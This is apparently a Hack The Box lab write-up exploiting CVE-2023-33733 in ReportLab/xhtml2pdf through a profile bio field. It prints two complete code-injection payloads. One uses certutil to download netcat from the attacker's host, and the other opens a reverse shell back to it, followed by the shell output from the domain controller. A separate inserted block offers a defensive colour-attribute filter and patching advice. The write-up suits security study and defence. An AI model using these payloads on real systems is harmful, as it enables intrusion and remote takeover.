CVE-2023-33733


The target web application is suspected to be vulnerable to CVE-2023-33733, as the Profile Export feature relies on what appears to be an outdated version of ReportLab. It was later revealed that xhtml2pdf is the underlying component used to transform HTML to PDF.

The bio field takes HTML input

Planting Netcat Binary


<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('certutil.exe -urlcache -split -f http://10.10.15.34/nc64.exe %TEMP%\\nc64.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
               exploit
</font></para>

I can place the PoC here to have the target system download the Netcat binary

It sends out a POST request to the profile endpoint at /accounts/profile/ with the data corresponding to those fields.
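The payload above works because xhtml2pdf hands the `color` attribute to ReportLab, which evaluates it as an expression rather than treating it as a plain colour literal. The following is an added example, not code from the write-up or from xhtml2pdf/ReportLab, showing how an application could guard that input on the server side before it ever reaches the PDF renderer: it parses the submitted HTML, checks every colour-bearing attribute against a strict allowlist, reports anything that looks like an expression, and can rewrite offending values to a safe default. The `COLOR_ATTRS` set, the allowlist regex and the constructed sample inputs are assumptions of this example; the malicious sample only mirrors the shape of the page's payload with the command elided and is inert.

```python
"""
Input-side guard for HTML that will be handed to xhtml2pdf / ReportLab.

Added example, not part of the original write-up. It assumes the
application renders a user-controlled "bio" string with xhtml2pdf and wants
to reject or neutralise colour attributes that are not plain colour literals
before the HTML reaches ReportLab's expression evaluator.
"""
import re
from html.parser import HTMLParser

# Attributes that xhtml2pdf/ReportLab may interpret as colour expressions
# (assumed set for this example).
COLOR_ATTRS = {"color", "bgcolor", "backcolor"}

# Allowlist of what a legitimate colour value looks like: a CSS named colour
# ("red"), a hex value ("#ff0000") or an rgb() tuple.  Anything else fails.
SAFE_COLOR = re.compile(
    r"^(?:[A-Za-z]{1,32}|#[0-9A-Fa-f]{3,8}"
    r"|rgb\(\s*\d{1,3}\s*,\s*\d{1,3}\s*,\s*\d{1,3}\s*\))$"
)

# Fragments that have no business in a colour value and indicate an attempt
# to reach Python internals through the evaluator.
SUSPICIOUS = ("getattr", "__globals__", "__class__", "lambda", "type(", "[[", "system(")


class _ColorAttrCollector(HTMLParser):
    """Collect (tag, attribute, value) for every colour-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in COLOR_ATTRS and value is not None:
                self.found.append((tag, name, value))


def find_unsafe_colors(html):
    """Return a list of findings; an empty list means every colour value
    matched the allowlist.  Each finding records the tag, attribute, raw
    value and the suspicious fragments seen (empty if only the allowlist
    check failed)."""
    parser = _ColorAttrCollector()
    parser.feed(html)
    findings = []
    for tag, attr, value in parser.found:
        if SAFE_COLOR.match(value.strip()):
            continue
        hits = [s for s in SUSPICIOUS if s in value]
        findings.append({"tag": tag, "attr": attr, "value": value, "fragments": hits})
    return findings


def neutralise_colors(html, fallback="black"):
    """Rewrite any colour attribute that fails the allowlist to `fallback`.
    A plain regex rewrite over the attribute text, meant as a second line of
    defence behind rejecting the request outright."""
    pattern = re.compile(
        r'(\b(?:' + "|".join(sorted(COLOR_ATTRS)) + r')\s*=\s*)(["\'])(.*?)\2',
        re.IGNORECASE | re.DOTALL,
    )

    def _fix(match):
        prefix, quote, value = match.group(1), match.group(2), match.group(3)
        if SAFE_COLOR.match(value.strip()):
            return match.group(0)
        return f"{prefix}{quote}{fallback}{quote}"

    return pattern.sub(_fix, html)


# Constructed sample inputs for this example.
BENIGN = '<para><font color="red">hello</font></para>'
# Shaped like the write-up's payload with the command elided; it is inert.
MALICIOUS = (
    "<para><font color=\"[[[getattr(pow, Word('__globals__'))['os'].system('...') "
    "for Word in [orgTypeFun('Word', (str,), {})] for orgTypeFun in [type(type(1))]]] "
    "and 'red'\">exploit</font></para>"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, find_unsafe_colors(sample))
        print(" rewritten:", neutralise_colors(sample))
```

The check should run on the server in the request handler for `/accounts/profile/`, not in the export path, so a rejected bio never gets stored; the rewrite helper is only a fallback for content already in the database. Upgrading ReportLab to a release that fixes CVE-2023-33733 is still the actual remediation, since attribute filtering protects one sink and not the evaluator itself.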

Exporting the profile

Netcat binary has been fetched

Reverse Shell


<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('%TEMP%\\nc64.exe 10.10.15.34 9999 -e cmd') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
               exploit
</font></para>

I will update the profile again with the payload, executing the transferred Netcat binary

Executing by exporting

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.252.94] 60240
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Web\University> whoami
 whoami
university\wao
 
C:\Web\University> hostname
 hostname
DC
 
C:\Web\University> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter vEthernet (Internal-VSwitch1):
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::47c0:fbc9:2d7b:e4bb%6
   IPv4 Address. . . . . . . . . . . : 192.168.99.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::5c4a:da33:e1f2:e210
   Link-local IPv6 Address . . . . . : fe80::381c:7ab:c80:ef91%4
   IPv4 Address. . . . . . . . . . . : 10.129.252.94
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%4
                                       10.129.0.1

Initial foothold established on the DC host as the wao account by exploiting CVE-2023-33733